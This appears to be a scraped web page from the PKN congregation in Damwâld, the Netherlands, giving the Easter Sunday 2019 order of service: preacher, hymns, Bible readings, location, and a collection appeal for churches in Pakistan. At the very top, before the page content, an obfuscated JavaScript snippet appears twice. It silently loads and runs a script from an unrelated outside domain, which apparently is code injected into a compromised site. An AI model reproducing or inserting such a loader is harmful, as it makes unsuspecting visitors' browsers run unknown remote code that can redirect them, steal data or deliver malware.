;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Eerste Paasdag - PKN Damwâld
zondag 21 april 2019
09:30 uur

Eerste Paasdag

Informatie

Voorganger:Ds. G.J. Otter
Organist:Jaap van der Horn
Liturgie
Lied voor de dienst Elb 122 : 1, 2, 3 en 4
Welkom
Aanvangslied Gez. 14 : 1 en 5
Stil gebed , Votum en Groet
We zingen: Uit Bundel ds. Troost lied 160 : 1, 4 en 5
Geloofsbelijdenis
We zingen: Elb 132 : 1 en 3
Gebed
We lezen: Joh.20: 1 - 19 en 2 Tim.1: 8 - 11
We zingen: Gez. 215 : 1 en 3
Preek .
We zingen: Ps. 116 : 1 en 4
Dankzegging en voorbede
Collecte
Kinderen van de King Kids komen in de kerk
We zingen: De steen is weg
We zingen: Elb 427 : 1, 2, 3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Versterk de kerk in Pakistan

Pasen: Versterk de kerk in Pakistan
Veel christenen in Pakistan voelen zich kwetsbaar en onzeker. Zij vormen een minderheid en behoren tot de laagste klasse, de armste bevolkingsgroepen. Veel christenen hebben bovendien weinig kennis over het christelijk geloof. Kerk in Actie bouwt samen met lokale kerken aan een sterke en vernieuwende kerk in Pakistan. Studenten en voorgangers kunnen, onder meer via internet, cursussen en trainingen volgen over discipelschap en theologie. Jaarlijks volgen 6.000 tieners een jongerentraining. Zij zijn het toekomstig kader van de kerk en staan dankzij deze training sterker in hun geloof. Bouw met uw Paascollecte mee aan een sterke en vernieuwende kerk in Pakistan.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds